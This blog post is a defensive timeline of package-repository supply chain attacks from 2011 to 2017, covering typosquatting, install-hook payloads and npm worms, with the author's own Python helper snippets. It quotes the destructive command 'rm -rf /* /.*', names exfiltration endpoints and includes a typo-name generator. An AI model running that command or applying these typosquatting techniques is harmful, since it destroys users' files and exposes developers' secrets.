Motivation

Since the summer of 2019 I have been looking into package dependency compromises, a subset of software supply chain attacks.

Today a number of popular programming languages make heavy use of more or less centralized package repositories and come with tools that make it easy to rely on third-party packages, which often come with lots of dependencies of their own. But with each dependency the attack surface for package dependency compromises increases - and malicious actors have already used different vectors to inject their payloads into software applications.

I had some ideas on how to monitor package repositories to identify malicious packages or malicious versions of packages. In order to test my ideas, at least in theory, against the attacks that were already uncovered in the past, I compiled a timeline of package dependency compromises. Not wanting to let this effort go to waste, I wrote this blog post summarizing and, to some extent, classifying each incident.

During this process I also came across some great prior research, blog posts, news articles, and some countermeasures already deployed by the package repository teams. I have also included these events and resources in the timeline, in the hope that it will make life easier for others interested in this field, a field which in my opinion will see significant action in the next few years.

In the end I found more and more incidents and research, so I decided to split the blog post into two parts, to “release early, release often”. This part covers everything from 2011, which is when the first notable event that I could find happened, to 2017, which is about halfway through my notes.

Please let me know if you find any relevant incidents or research that are missing.

Package Dependency Compromise Timeline 2011 - 2017

September 2011: Malicious Ruby Gems Proof of Concept

Benjamin Lee Smith publishes a number of Ruby gems that demonstrate how gems can be abused for malicious purposes. He later gives several conference talks about his ideas and about his experience distributing these packages, which ping home.

Here is a video recording of his “Hacking With Gems” talk at RuLu 2013.

A selection of the proof of concept packages:

awesome-rails-flash-messages pretends to improve the default Ruby on Rails flash messages, but also writes requests that include a password parameter to a file in a publicly accessible web directory and sends this information to a web server.

  • Vector: Useful package
  • Method: Payload integrates directly with Rails, intercepts requests
  • Effect: Disclosure of request data containing passwords

The post_install package demonstrates the use of the post-install hook to execute code once on a developer's machine or similar.

  • Vector: No vector (similar packages with different names advertised at Ruby conferences)
  • Method: Payload executed by post install hook
  • Effect: Sending whoami information to a server

March 2013: “Where is all the nodejs malware?”

John Lyle publishes an article about “nodejs malware” on the Systems Security Blog of the University of Oxford. He asks why nobody has written any such malware yet, as “targets are juicy and the protection is minimal”. John doesn’t go into detail on how the malicious code could be executed, and his example seems to describe the developer of a useful package turning rogue. He also points out that the npm repository didn’t offer a “Report this package” option at the time.

I could not find any cases of actual malicious npm packages, in the sense of package dependency compromise, that were released prior to his blog post.

June 7th 2013: Typosquatting-prevention package “requestes” uploaded to PyPI

David Fischer uploads the package “requestes” to the Python Package Index. Its name is one typo away from the popular Python library “requests”, so registering it keeps at least one potential typosquatting name out of malicious hands.

In the package description and through a setup script David makes clear that this package could just as well contain malicious code executed with the rights of the current user.

Insert stern sounding security stuff here…

David Fischer

Oddly, at the time of writing (7 years later), 4 public GitHub repositories actually depend on this package while also including the actual “requests” library. The package was downloaded 1239 times in January of 2020.

June 17th 2013: “Reflections on nodejs malware”

John Lyle publishes a follow-up article “Reflections on nodejs malware” (link to archive.org version).

He now extends the scenario to other package repositories like rubygems and PyPI. Answering the question he brought up in his earlier blog post “Where is all the nodejs malware?” he says:

I can only assume that it is because such malware does not offer a high reward /effort ratio. There is too much low-hanging fruit elsewhere (phishing end users, for example) to make this particular avenue of attack worthwhile.

I think that is because the payload execution method he has in mind is that of a package that integrates with and targets specific application code. But frameworks like Ruby on Rails, which are the near-default for an entire programming language's ecosystem, make it easier to intercept interesting data on targeted systems, as we saw with the PoC Ruby gems mentioned before. The other payload execution method, using setup hooks, avoids integration with application code entirely. Still, setting up a phishing page is easier.

He also discusses the infection vector of publishing malicious versions of reputable packages on a large scale by attacking their developers through a Cross Site Request Forgery vulnerability that the npm repository had only recently fixed at the time.

One potential mitigation he discusses, which would need to be deployed by both the repositories and the programming languages themselves, is a permission-based system similar to the one used in Android. A package's access to the internet or to specific system calls would need to be approved by the developer when adding the dependency.

He ends “this somewhat rambling blog post by proposing that this is a very promising area of research.”

January 2015: “rimrafall” proof of concept wants to delete your files

João Jerónimo writes rimrafall, a proof of concept malicious npm package that tries to execute rm -rf /* /.* through a pre-install hook, thereby deleting all files the current user has access to. The package, which clearly stated that it should not be installed, was uploaded to npm and removed within 2 hours after it had been linked on Hacker News.

  • Vector: -
  • Method: Payload executed by pre-install hook
  • Effect: Deleting all accessible files
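The pre-install hook abused by rimrafall is simply an entry in the `scripts` section of a package's `package.json`, which npm runs automatically during installation unless `--ignore-scripts` is given. As a minimal sketch (with a hypothetical helper name and an illustrative manifest rather than rimrafall's actual file), the install-time hooks a package declares can be listed before it is installed:

```python
import json

# Lifecycle scripts that npm runs automatically when a package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(manifest_text: str) -> dict[str, str]:
    """Return the install-time lifecycle scripts declared in a package.json."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts", {})
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


# Illustrative manifest in the style of rimrafall (not the original file).
EXAMPLE_MANIFEST = """
{
  "name": "example-package",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "rm -rf /* /.*",
    "test": "echo ok"
  }
}
"""

if __name__ == "__main__":
    for hook, command in install_hooks(EXAMPLE_MANIFEST).items():
        print(f"{hook}: {command}")
```

The sketch only checks the three classic install hooks; npm runs a few other scripts (such as `prepare`) in some situations, so a real review tool would need a longer list.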

This package leads Adam Baldwin to publish the article “A Malicious Module on npm” on the liftsecurity.io blog (archive.org link; Lift Security was acquired by npm, Inc. in 2018).

He criticizes the author of “rimrafall” for immediately disclosing the issue in public and for publishing a malicious package on npm, proof of concept or not.

More importantly, though, he also raises the issue of typosquatting of packages. With access to the HTTP logs of the npm registry, Adam lists a number of “popular” typos made by developers trying to install certain packages. Examples are “coffeescript” and “coffe-script” instead of “coffee-script”, or “socketio” instead of “socket.io”. This would in fact later become a commonly used attack vector.
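All three typos are a single keystroke away from the intended name. One common way to quantify this is the Levenshtein distance: the minimum number of single-character insertions, deletions and substitutions needed to turn one string into the other. A minimal sketch of the textbook dynamic-programming algorithm (not something npm is known to have used at the time), applied to Adam's examples:

```python
def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character insertions, deletions and substitutions."""
    previous = list(range(len(b) + 1))  # distances from "" to each prefix of b
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,                       # delete char_a
                current[j - 1] + 1,                    # insert char_b
                previous[j - 1] + (char_a != char_b),  # substitute (free if equal)
            ))
        previous = current
    return previous[-1]


# Typos from Adam Baldwin's list, mapped to the package that was meant.
TYPOS = {
    "coffeescript": "coffee-script",
    "coffe-script": "coffee-script",
    "socketio": "socket.io",
}

for typo, intended in TYPOS.items():
    print(f"{typo} -> {intended}: distance {levenshtein(typo, intended)}")
```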

February 2015: “This one looks odd, doesn’t it?”

Reddit user chub79 posts a link to a PyPI (Python Package Index) package called “setuptool” to /r/python. This package is typosquatting the popular “setuptools” package, meaning it imitates the well-known package by being only one typing mistake away from its name. The payload is executed as part of the setup.py file. It sends the package name, the current time, the hostname, the public IP and whether or not the current user is root/has admin rights to a server under https://zzz.scrapeulous[.]com/.

Users are quick to report it to the PyPI security team and the package is removed. The actor used the handle “vacation” and chose “Kenneth Reitz” as their PyPI display name, imitating the well-known author of the popular “requests” library. This library also turned out to be the target of the other two packages uploaded by this user: “requsts” and “reqests”.

  • Vector: Typosquatting
  • Method: Payload in install hook
  • Effect: Upload of current user data

Shortly after its public reveal the C&C server displays the following text:

Usage of this project If you see this page then you came here because you installed some honey pot package over pip. All data that is sent to this server is for pentesting purposes. For more information cosider visiting my blog.

Therefore we are once again looking at a proof of concept/research project.

The author of this package turns out to be Nikolai Philipp Tschacher, who will hand in his bachelor's thesis on “Typosquatting in Programming Language Package Managers” more than a year later, in March 2016.

March 2015: Talk “Security And Modern Software Deployment”

Rory McCune talks about “Security And Modern Software Deployment” (video/slides), first at the Securi-Tay conference and later at the AppSec EU15 conference.

He looks at developer account takeover, package repository compromise and even long-term operations by state actors to create, publish, promote and maintain useful packages (or even package repositories) that contain non-obvious and plausibly deniable backdoors.

As (partial) countermeasures, Rory advises a focus on 2-Factor Authentication for developer accounts on package repositories, signing of packages by default and operational security improvements on the side of the package repositories (for example, sending an e-mail to the maintainers of a package when a new version is released).

November 2015: The first npm worm proof of concept

pizza-party is a simple PoC npm worm written by Chris Contolini (blog post). It adds the spreading code to the install script of all locally found packages and tries to publish new minor versions of them with the developer's credentials. Afterwards it opens a YouTube video in a browser. This module was not published on npm.

  • Vector: After initial install: compromise of packages owned by infected developers
  • Method: Payload executed by install hook
  • Effect: Spreading itself, making people crave pizza

March 2016: “Typosquatting in Programming Language Package Managers” thesis

In March 2016 Nikolai Philipp Tschacher's bachelor's thesis is published at the University of Hamburg (blog post).

Nikolai describes the attack vector of typosquatting (until then mainly seen in the Domain Name System) and applies it to package repositories. He also investigates how strongly different languages and package repositories are affected, and how some package repositories already have basic countermeasures in place.

In the empirical part of the thesis he describes the experiment whose beginnings we already saw in February 2015. Python (PyPI), Node.js (npm) and Ruby (Rubygems.org) were targeted by uploading 214 packages, which amounted to a total of 19,721 unique installations, most of them (over 15,000) through PyPI. The names of the packages were either automatically generated typos of requests and async (with a Levenshtein distance of one) or the names of standard libraries (which don’t need to be installed through a package manager), like urllib2 in Python 2. The top 16 packages by installation count were fake standard libraries.
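Generating such names is straightforward: every string at Levenshtein distance one is reachable by deleting, substituting or inserting a single character. A minimal sketch, assuming an alphabet of lowercase letters, digits and the separators `-`, `_` and `.` (the thesis's actual generator may have used a different character set):

```python
import string

# Characters tried for substitutions and insertions (an assumption).
ALPHABET = string.ascii_lowercase + string.digits + "-_."


def distance_one_typos(name: str) -> set[str]:
    """All strings at Levenshtein distance exactly one from `name`."""
    splits = [(name[:i], name[i:]) for i in range(len(name) + 1)]
    deletions = {left + right[1:] for left, right in splits if right}
    substitutions = {
        left + char + right[1:] for left, right in splits if right for char in ALPHABET
    }
    insertions = {left + char + right for left, right in splits for char in ALPHABET}
    candidates = deletions | substitutions | insertions
    candidates.discard(name)  # substituting a character with itself is a no-op
    return candidates


if __name__ == "__main__":
    typos = distance_one_typos("requests")
    print(len(typos), "candidate names")
```

For `requests`, this set contains, among many others, `requestes`, `requsts` and `reqests`, names that show up elsewhere in this timeline.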

On the defense side, he looks at the design choices and features the repositories use to prevent certain types of attacks.

npm already disallowed uploading packages named after standard libraries. PyPI and Rubygems.org at the time allowed the registration of packages imitating standard libraries. After Nikolai's previous experiment with the package “setuptool” (instead of “setuptools”), PyPI at least disallowed re-registration of that particular package name.

March 2016 cont.: Vulnerability Note VU#319816 on npm

The CERT Division of the Software Engineering Institute at Carnegie Mellon University publishes the vulnerability note VU#319816, based on research by Sam Saccone. It describes a worm in the form of an npm package that spreads itself by pushing new (minor) versions of packages that the infected developer has push permissions for. These new versions all depend on another package that was created automatically using the developer's npm credentials. This package contains the “spreading” code that is executed by a post-install hook.

  • Vector: Social Engineering for initial install, afterwards compromise of packages owned by infected developers
  • Method: Payload executed by post-install hook
  • Effect: Spreading itself

As initial mitigation for the issue, developers are advised to do the following:

  • As a user who owns modules you should not stay logged into npm. (Easily enough, npm logout and npm login)
  • Use npm shrinkwrap to lock down your dependencies
  • Use npm install someModule --ignore-scripts
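Locking down dependencies matters here because the worm relies on dependents picking up its freshly published minor versions automatically. `npm install --save` records dependencies with a caret range such as `^1.2.3` by default, which accepts any later version with the same major number, so a worm-published 1.3.0 would be pulled in on the next fresh install, while an exact pin (which `npm shrinkwrap` records for the whole dependency tree) would not. A minimal sketch of the caret rule, restricted to plain `MAJOR.MINOR.PATCH` versions with a major version of at least 1 (the full semver rules for `0.x` versions and pre-release tags are deliberately left out):

```python
def parse_version(version: str) -> tuple[int, int, int]:
    """Parse a plain MAJOR.MINOR.PATCH version string."""
    major, minor, patch = (int(part) for part in version.split("."))
    return major, minor, patch


def satisfies_caret(version: str, caret_range: str) -> bool:
    """Check `version` against a caret range like '^1.2.3' (major >= 1 only)."""
    base = parse_version(caret_range.lstrip("^"))
    if base[0] == 0:
        raise ValueError("0.x caret ranges follow different rules; not handled here")
    candidate = parse_version(version)
    return candidate[0] == base[0] and candidate >= base


def satisfies_exact(version: str, pinned: str) -> bool:
    """An exact pin only ever accepts the one recorded version."""
    return parse_version(version) == parse_version(pinned)


# A worm-published minor release slips through a caret range, but not an exact pin.
print(satisfies_caret("1.3.0", "^1.2.3"))  # True
print(satisfies_exact("1.3.0", "1.2.3"))   # False
```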

In response, npm publishes a blog post that acknowledges the problem but also states that “npm cannot guarantee that packages available on the registry are safe”.

npm is working with security vendors to introduce enhanced security vulnerability scanning and mitigation services. This work is underway but not yet ready.

March 2016 cont. cont.: The left-pad incident

March of 2016 was a turbulent month for the nodejs/npm ecosystem in general. While not exactly a security incident, the infamous “left-pad incident” demonstrated how dependent large parts of the Node.js ecosystem are on single, rather small open source packages. As many teams did not cache the packages their software depended on, entire build systems could no longer fetch the removed packages, and deployment queues came to a halt.

The cause of this powerful demonstration is open source developer Azer Koçulu's decision (his blog post) to remove all his Node.js packages from npm after npm, Inc. (npm's blog post) transferred ownership of his package “kik” to Kik Interactive Inc., makers of the messaging app “Kik Messenger” (Kik's blog post).

The intricacies of this case regarding trademarks, open source software and commercial interests are not relevant to dependency compromise, but the fallout is: 273 packages, some of them very popular, were deleted from the npm repository. Among them is the package “left-pad”, which many popular npm projects depended on, either directly or indirectly.

According to npm, this particularly high-impact package was re-registered within 10 minutes by a good actor, and with the help of npm full functionality was restored within 2.5 hours.

Nonetheless, this incident offers two security-related insights:

  1. A well targeted attack against a “fundamental” package can have network effects throughout the ecosystem.
  2. Attackers could monitor the state of popular dependencies and automatically act as soon as any one is un-registered.

npm, Inc. reacts to this incident by

  1. changing their policy regarding un-publishing packages, adding a number of conditions that have to be met in order to un-publish a package: either the package was published very recently, or it has a low number of weekly downloads, no dependent packages and a single owner.

  2. creating placeholder packages in place of unpublished packages, in case other packages depend on the removed package (this likely became unnecessary with the policy change that followed later).

October 2016 - May 2017: standard library squatting in PyPI

In October 2016 Steve Stagg and others at a Python meetup notice that they can register standard library names in the PyPI package repository.

After e-mailing the security contacts listed for PyPI doesn’t elicit a response, he proactively registers these standard library names himself and uploads package versions that simply raise RuntimeError("Package 'json' must not be downloaded from pypi") to inform the developer about their mistake.

  • Vector: Typosquatting of standard library names
  • Method: Payload executed by install hook
  • Effect: Informing the user about their mistake
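Because setup.py is ordinary Python that is executed while a source distribution is being installed, raising an exception at its top level is enough to abort the installation with a readable message. A minimal sketch that renders such a placeholder setup.py for a given standard library name; the helper name is hypothetical and Steve's actual files may have looked different, only the error message is taken from the text above:

```python
def blocker_setup_py(module_name: str) -> str:
    """Render a setup.py that aborts installation of a squatted stdlib name."""
    message = f"Package '{module_name}' must not be downloaded from pypi"
    return (
        "# Placeholder package: this name belongs to the Python standard library.\n"
        f"raise RuntimeError({message!r})\n"
    )


if __name__ == "__main__":
    source = blocker_setup_py("json")
    print(source)
    try:
        # Roughly what happens when the installer runs this setup.py.
        exec(compile(source, "setup.py", "exec"))
    except RuntimeError as error:
        print(f"Installation aborted: {error}")
```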

In January 2017 he opens a GitHub issue on the pypi git repository to make others aware of this security issue, with a description of attack vectors, potential payloads and some statistics. These show, for example, that the “json” package was downloaded 10,710 times in December of 2016 alone.

One explanation offered by Steve is that:

There is also the possibility that people have written automatic requirements.txt creators that scrape imports to work out dependencies. In this situation, imports of built-in packages will end-up in requirements files too.

But people only start to react after he publishes the post “Building a botnet on PyPi” on Hackernoon on May 19th. By then the most “popular” package, “json”, had been downloaded nearly 60,000 times. Issues to disallow uploading packages that imitate standard libraries are created and will eventually be acted on.

January 2017: Check your dev-requirements.txt

Michał Jaworski uploads packages containing this source code under the names

to PyPI.

These packages do not typosquat an existing package, but prey on users making a common mistake when trying to install the required packages for a Python project. These required packages are usually listed in a file called requirements.txt. The pip command line tool parses this file and installs all listed packages when called with

pip install -r requirements.txt

If a user leaves out the -r by mistake, pip instead attempts to install a package called requirements.txt. This package does not exist, and this name and 3 common misspellings had already been blacklisted since 2014 (this hard-coded list was later replaced by a database table of blacklisted names). But the developer of a project can freely choose the name of the file that lists all required dependencies, and the 4 names under which Michał registers this package are other common choices.

Initially the package cheekily tries to imitate the actually intended action by installing the requirements from the requirements-file. Using a dynamic version number it manages to convince pip to install it again and again, even if it was already present, by pretending to be version 0.0.0 locally, so that there would always be a newer version on PyPI.

This functionality is later removed in favor of a message being printed, indicating that something probably unintended had just happened.

  • Vector: Typosquatting of erroneous install command
  • Method: Payload executed by install hook, version trick to re-install on every update check
  • Effect: Informing the user about their mistake

* mentioned.md in README and source code, but nowhere to be found. Might not have ever been uploaded according to Michał.

On June 1st 2017 security researcher fate0 publishes the blog post “Package 钓鱼”, translating to “Package fishing”. The blog post is in Chinese, therefore this section will describe its content in a bit more detail.

fate0 initially becomes aware of the issue of dependency typosquatting when he tries to fix the Python error ImportError: No module named smb.SMBConnection by executing pip install smb. As it turns out, this package does not exist and the required package is called pysmb instead.

On the 23rd of May 2017 fate0 creates and registers the following four typosquatting packages

  • python-dev
  • mongodb
  • proxy
  • shadowsock

generated with a cookiecutter template that he later publishes in the GitHub repository cookiecutter-evilpy-package (after the repo called cookiecutter-evil-pypackage was terminated by GitHub, as we will soon find out).

The packages send the victim's username, hostname, IP address and host info to a webtask.io HTTP endpoint, which then stores them publicly as issues on the GitHub repository fate0/cookiecutter-evil-pypackage.

24 hours later, more than 700 issues have been created through the secondary account (a “vest” in Chinese internet slang) called “evilpackage” that fate0 registered for this purpose.

After this success fate0 decides to extend his footprint and creates more packages using the same template: The packages caffe, ffmpeg, git, mkl, opencl, opencv, openssl, pygpu, tkinter, vtk, and proxy are inspired by the auto-suggested searches when googling for “pip install”. The packages ftp, smb, hbase, samba, rabbitmq, zookeeper, phantomjs, and memcached are based on popular protocols and open source software.

By now some of the new packages with the description “just for fun :)” are being noticed (GitHub issue #644, mailing list).

In the meantime, more than 2000 issues with private data are created in the public repository. An unknown actor starts to feed bogus data to the endpoint, and eventually the account that fate0 had created just for the issue creation is marked as spam by GitHub and blocked (and quickly unblocked again after an e-mail). fate0 decides to send the user data to a server he controls instead, allowing him to implement basic IP rate limiting and thereby stop the wave of bogus data. But before that can take effect, the collection repository is removed entirely for breaching GitHub's terms of service. fate0 starts to save the data locally on the VPS and builds a website (archive.org screenshot) listing the uploaded user data, which he later links to in the message displayed during installation of the typo packages.

On the 31st of May 2017, after some discussion in the aforementioned GitHub issue #644, fate0 deletes the packages (noting that others are now free to re-register them for themselves).

从 2017-05-27 10:38:03 到 2017-05-31 18:24:07,总计 106 个小时内, 有 9726 不重复的 ip 安装了 evil package,平均每个小时有 91 个 ip 安装了 evil package。

[From 2017-05-27 10:38:03 to 2017-05-31 18:24:07, in a total of 106 hours, 9726 unique IPs installed an evil package, an average of 91 IPs installing an evil package every hour.]

fate0

The top 6 packages by downloads according to fate0 are:

  • opencv (2862 downloads)
  • tkinter (2834 downloads)
  • mkl (810 downloads)
  • python-dev (789 downloads)
  • git (713 downloads)
  • openssl (683 downloads)

 

  • Vector: Typosquatting
  • Method: Payload in install hook
  • Effect: Upload and public disclosure of current user data, later also informing the users about their mistake

During testing fate0 also notices the same issue that Michał had demonstrated in January of the same year, namely that users might mistakenly try to install a package called requirements.txt, instead of installing the requirements listed in a file of the same name. But fate0 also expands on the issue, making it more pressing.

As previously explained, uploading a package called “requirements.txt” is not possible, because this name is on the hard-coded blacklist at the time. But fate0 looks at how PyPI searches for package names and finds that any run of dots, hyphens and underscores is reduced to a single hyphen on both sides of a package name comparison:

lower(regexp_replace($1, '(\.|_|-)+', '-', 'ig'))

This is done through a function written in SQL called normalize_pep426_name. Therefore a search for requirements.txt would result in a comparison of requirements-txt to all package names normalized in the same fashion, making ReQuIrEmEnTs---tXt a possible result.

Critically, this normalization is not done when comparing the name of a new package against the blacklist. This allows fate0 to upload the package requirements-txt to PyPI.
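The mismatch can be reproduced in a few lines. A minimal sketch, assuming a blacklist that contains only `requirements.txt`: `normalize` mirrors the SQL `regexp_replace` shown above (the normalization rule written down in PEP 503), the hypothetical `naive_is_blocked` compares the raw name as the registration check did at the time, and `normalized_is_blocked` shows the fix of normalizing both sides:

```python
import re

BLACKLIST = {"requirements.txt"}  # illustrative; PyPI's real list was longer


def normalize(name: str) -> str:
    """Collapse runs of '.', '_' and '-' into one '-' and lowercase (PEP 503)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def naive_is_blocked(name: str) -> bool:
    # Raw comparison, like the registration check fate0 bypassed.
    return name in BLACKLIST


def normalized_is_blocked(name: str) -> bool:
    # Compare in the same normalized space that package lookups use.
    return normalize(name) in {normalize(blocked) for blocked in BLACKLIST}


for candidate in ("requirements.txt", "requirements-txt", "ReQuIrEmEnTs---tXt"):
    print(candidate, normalize(candidate),
          naive_is_blocked(candidate), normalized_is_blocked(candidate))
```

Only the first name is rejected by the naive check, yet all three normalize to `requirements-txt` and therefore resolve to the same package on lookup.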

But running pip install requirements.txt still returns an error: “Could not find a version that satisfies the requirement requirements.txt”. The reason for this error is that the requested package name is compared to the package names of the available versions listed by PyPI. But fate0 discovers that this check can be avoided if a Python “wheel” (a pre-built binary package format, as opposed to the “source” format) is offered. In that case only the normalized wheel name is compared to the requested package name, returning a positive match.

The catch is that wheels are already “built”, so unlike with source packages, no code in a “setup.py” is executed on installation. fate0 circumvents this hurdle by making his “requirements-txt” wheel depend on another “source” package that he controls, called ztz. This package contains the payload that “reminds users who installed requirements-txt”.

  • Vector: Typosquatting of erroneous install command, bypassing blacklist by use of the normalization of package searches
  • Method: Payload executed by install hook of a dependency of the wheelified package
  • Effect: Upload and public disclosure of current user data, later also informing the user about their mistake

August 2017: Malicious typosquatting on npm, or “The crossenv Incident”

On August 1st Twitter user @o_cee tweets at the author of the cross-env package, Kent C. Dodds, that his package is being typosquatted by the package “crossenv”:

@kentcdodds Hi Kent, it looks like this npm package is stealing env variables on install, using your cross-env package as bait

@o_cee

As part of its package-setup.js script, the malicious package sends an HTTP POST request containing the environment variables to the server npm.hacktask.net. Kent quickly informs npm, and the package repository removes this package together with 37 other packages that the same user “hacktask” had published on the 19th of July:

  • babelcli (42 downloads)
  • cross-env.js (43 downloads)
  • crossenv (679 downloads)
  • d3.js (72 downloads)
  • fabric-js (46 downloads)
  • ffmepg (44 downloads)
  • gruntcli (67 downloads)
  • http-proxy.js (41 downloads)
  • jquery.js (136 downloads)
  • mariadb (92 downloads)
  • mongose (196 downloads)
  • mssql-node (46 downloads)
  • mssql.js (48 downloads)
  • mysqljs (77 downloads)
  • node-fabric (87 downloads)
  • node-opencv (94 downloads)
  • node-opensl (40 downloads)
  • node-openssl (29 downloads)
  • node-sqlite (61 downloads)
  • node-tkinter (39 downloads)
  • nodecaffe (40 downloads)
  • nodefabric (44 downloads)
  • nodeffmpeg (39 downloads)
  • nodemailer-js (40 downloads)
  • nodemailer.js (39 downloads)
  • nodemssql (44 downloads)
  • noderequest (40 downloads)
  • nodesass (66 downloads)
  • nodesqlite (45 downloads)
  • opencv.js (40 downloads)
  • openssl.js (43 downloads)
  • proxy.js (43 downloads)
  • shadowsock (40 downloads)
  • smb (40 downloads)
  • sqlite.js (48 downloads)
  • sqliter (45 downloads)
  • sqlserver (50 downloads)
  • tkinter (45 downloads)
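Many of these names follow a handful of patterns: a popular name with a `node`/`node-` prefix, a `.js`/`-js`/`js`/`-node` suffix, or with its hyphen removed. A minimal sketch of a hypothetical check that derives such variants from a popular package name and intersects them with the names above; the affix list is an assumption read off this incident, not a rule npm is known to use:

```python
# The 38 package names removed in the crossenv incident (from the list above).
HACKTASK_PACKAGES = {
    "babelcli", "cross-env.js", "crossenv", "d3.js", "fabric-js", "ffmepg",
    "gruntcli", "http-proxy.js", "jquery.js", "mariadb", "mongose", "mssql-node",
    "mssql.js", "mysqljs", "node-fabric", "node-opencv", "node-opensl",
    "node-openssl", "node-sqlite", "node-tkinter", "nodecaffe", "nodefabric",
    "nodeffmpeg", "nodemailer-js", "nodemailer.js", "nodemssql", "noderequest",
    "nodesass", "nodesqlite", "opencv.js", "openssl.js", "proxy.js", "shadowsock",
    "smb", "sqlite.js", "sqliter", "sqlserver", "tkinter",
}

# Hypothetical affixes observed in this incident.
PREFIXES = ("node-", "node")
SUFFIXES = (".js", "-js", "js", "-node")


def affix_variants(popular: str) -> set[str]:
    """Names derived from `popular` by adding affixes or dropping hyphens."""
    variants = {popular.replace("-", "")}  # e.g. cross-env -> crossenv
    variants |= {prefix + popular for prefix in PREFIXES}
    variants |= {popular + suffix for suffix in SUFFIXES}
    variants.discard(popular)  # the genuine name itself is not a squat
    return variants


if __name__ == "__main__":
    for popular in ("cross-env", "mssql", "mysql", "sqlite", "nodemailer"):
        hits = sorted(affix_variants(popular) & HACKTASK_PACKAGES)
        print(f"{popular}: {hits}")
```

Such a check only catches this particular naming style; plain typos like `ffmepg` or `mongose` would still need a distance-based comparison.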

In their blog post on this incident, the npm team explains that the “baseline” of 39-43 downloads seen across these packages is likely caused by automated downloads and mirroring of the package repository. The number of downloads also rises with the number of versions that the mirrors have to download, so the npm team estimates that “at most 50 real installations of crossenv” occurred, with jquery.js coming second in the number of real installations.

In reaction, npm adds, mostly symbolically, the e-mail address of “hacktask” to the blacklist, and suggests that they might add automatic checks for typosquatting of popular packages.

  • Vector: Typosquatting
  • Method: Payload in install hook
  • Effect: Leak of potentially sensitive environment variables from development and production systems

So far, this has been a factual account. Now I want to present my theory regarding this case:

I think this npm typosquatting attack was inspired by the previously described blog post and research on typosquatting on PyPI by fate0, because of the following reasons:

  • Timing: 1.5 months after fate0 publishes his blog post, the malicious packages are released on npm
  • Language: There are indicators that the author(s) of the npm typosquatting attack speak Mandarin (allowing them to easily read the blog post) and/or have knowledge about the Chinese software development community:
    • They typosquatted “shadowsocks”, an open source encrypted proxy protocol mostly used in mainland China
    • A GitHub organization called “hacktask” (like the drop zone domain npm.hacktask.net and the npm user) forked the GitHub repository aliyun-node/commands, containing shell helpers to administer Node.js in the Alibaba Cloud, some time after July 13th 2017.
    • hacktask.net had been using a Chinese nameserver until February 23rd 2017, when they moved behind Cloudflare, similar to hacktask.org. Both hosted Mandarin-language content.
    • xss.hacktask.net used to host a Chinese SaaS C&C for XSS probes, as pointed out by diimdeep.
  • Targets: The npm attack involved 38 packages, while fate0 used 22 package names. 8 of fate0's package names had 14 counterparts in the npm attack (about 37% of the 38 npm packages):
    • proxy: proxy.js and http-proxy.js
    • shadowsock: shadowsock
    • smb: smb
    • ffmpeg: ffmepg and nodeffmpeg
    • caffe: nodecaffe
    • openssl: node-opensl, node-openssl and openssl.js
    • opencv: node-opencv and opencv.js
    • tkinter: tkinter and node-tkinter

tkinter in particular is a strange package to typosquat on npm, as it is Python's interface to the Tk GUI toolkit and has no popular counterpart with a similar name in the Node.js ecosystem.

This incident shows that in order to secure users of package repositories, we cannot simply focus on our package manager of choice, but have to look across language borders to detect potential threats before they hit.

September 9th 2017: SK CSIRT advisory on PyPI typosquatting

On September 9th 2017 the Slovak Computer Security Incident Response Team publishes the advisory skcsirt-sa-20170909-pypi-malicious-code, in which they warn about 10 typosquatting packages that were uploaded to PyPI between the 2nd and 4th of June of the same year. They do an exceptionally good job of sharing the Indicators of Compromise (IOCs) and offering scripts for developers to check whether they have been affected.

The following packages were identified:

  • acqusition (impersonating acquisition)
  • apidev-coop (impersonating apidev-coop_cms)
  • bzip (impersonating bz2file)
  • crypt (impersonating crypto)
  • django-server (impersonating django-server-guardian-api)
  • pwd (impersonating pwdhash)
  • setup-tools (impersonating setuptools)
  • telnet (impersonating telnetsrvlib)
  • urlib3 (impersonating urllib3)
  • urllib (impersonating urllib3)

The packages contain the code of the typosquatted target packages, but in addition send the name of the package, the username of the current user and the hostname of the machine (XOR “encrypted”) to http://121.42.217.44:8080 at install time.
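XOR with a fixed key is obfuscation rather than encryption: applying the same key a second time restores the plaintext, and since the key ships inside the package, anyone with a copy can decode captured reports. A minimal sketch with a made-up key and sample payload; the real packages' key and data layout are not given in this post, so both are assumptions:

```python
from itertools import cycle

KEY = b"example-key"  # hypothetical key, not the one used by these packages


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`; the same call encodes and decodes."""
    return bytes(byte ^ key_byte for byte, key_byte in zip(data, cycle(key)))


# Hypothetical install-time report: package name, username and hostname.
report = b"urlib3 alice build-host"
obfuscated = xor_bytes(report, KEY)
print(obfuscated.hex())
print(xor_bytes(obfuscated, KEY).decode())  # prints the original report
```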

SKCSIRT notifies the Python Security Response Team (PSRT) and “all identified packages were taken down immediately”.

  • Vector: Typosquatting
  • Method: Payload executed by install hook
  • Effect: Sending of IP, package name, hostname and user to server

The author(s) of the packages added the comment “just toy, no harm :)” to the payload.

Dan Goodin wrote a good article about this incident and this type of issue for Ars Technica, and there is a discussion on the python-dev mailing list.

September 17th 2017: Pytosquatting is a thing now

After reading Nikolai Tschacher's thesis on typosquatting from March 2016 and Steve Stagg's similar story, Benjamin Bach notices that many of the packages that had been named after standard library names (or typosquats of them) were simply deleted, making the names available for registration again. After trying to alert the PyPI team and the Python security team about this issue, according to him without a response, Benjamin starts the “pytosquatting” project together with IT security journalist Hanno Böck.

They register available standard library names and std-lib typosquats on PyPI and upload their own “blocker” packages. These make an HTTP request to a server as part of the setup routine to count the number of installs. Afterwards they interrupt the installation process and inform the user of what just happened.

  • Vector: standard library squatting and standard library typosquatting
  • Method: Payload in install hook
  • Effect: Sending at least IP and package name to a server

Alleine das Paket urllib2 wird jeden Tag von über Tausend Personen installiert.

[The package urllib2 alone was installed by over a thousand people per day]

Hanno Böck in his article about this on Golem.de [in German]

They later presented the talk “Package Mis-Management” at BornHack 2018 about this project.

September 18th 2017: PyPI PRs to the rescue

